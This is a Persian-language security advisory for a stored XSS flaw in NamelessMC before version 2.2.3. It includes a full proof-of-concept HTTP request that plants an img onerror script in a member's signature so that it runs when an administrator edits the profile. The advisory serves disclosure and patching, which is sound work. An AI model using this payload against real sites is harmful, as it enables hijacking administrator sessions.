NamelessMC یک نرمافزار رایگان، قدرتمند و آسان جهت استفاده بهمنظور ساخت وبسایت سرورهای ماینکرافت است.
یک آسیبپذیری XSS در نسخههای قبل از 2.2.3 این نرمافزار وجود دارد که به مهاجمان راه دور احراز هویتشده اجازه میدهد از طریق مؤلفه ویرایشگر متن داشبورد، اسکریپت یا کد HTML دلخواه خود را تزریق کنند.
هر کاربر قادر است کد دلخواه خود را در بخش signature وارد کند. در نتیجه، زمانی که یک کاربر دارای دسترسی (برای مثال مدیر وبسایت) پروفایل او را مشاهده کند، کد تزریقشده اجرا میشود. علاوه بر این، امکان تزریق کد در بخشهای دیگر مانند ویرایشگر کوکی نیز وجود دارد.
بهرهبرداری از این آسیبپذیری توسط کاربری با نقش Member:
درخواستهای HTTP زیر ارسال میشود که امضای کاربر را به کد دلخواه تغییر میدهد:
POST /nameless/user/settings/ HTTP/1.1
Host: [REDACTED]
Content-Length: 262
Cache-Control: max-age=0
Origin: http://[REDACTED]
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: [REDACTED]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-GB,en;q=0.6
Referer: http://[REDACTED]/nameless/user/settings/
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=[REDACTED]
Connection: keep-alive
nickname=test&topicUpdates=1&privateProfile=0&language=English+UK&timezone=Europe%2FWarsaw&signature=%3cp%3e%26lt%3bimg%20src%3dx%20onerror%3d%22javascript%3aalert(document.domain)%22%20%2f%26gt%3b%3c%2fp%3e&action=settings&token=c9f0f105d352b1141159b6c3404df947
سپس صبر کنید تا مدیر وارد پروفایل کاربر شود و روی ویرایش کلیک کند.
از دید مدیر، کافی است پروفایل کاربر را در داشبورد باز کرده و روی ویرایش کلیک نماید. در این صورت کد تزریقشده اجرا خواهد شد.
محصولات آسیبپذیر
-
نسخههای قبل از 2.2.3
توصیههای امنیتی
- به کاربران توصیه میشود در صورت استفاده از این نرمافزار، آن را به نسخهی 2.2.4 بهروزرسانی نمایند.
منابع خبر:
[1]https://nvd.nist.gov/vuln/detail/CVE-2025-54117
[2]https://github.com/NamelessMC/Nameless/security/advisories/GHSA-gp3j-j84w-vqxx
- 13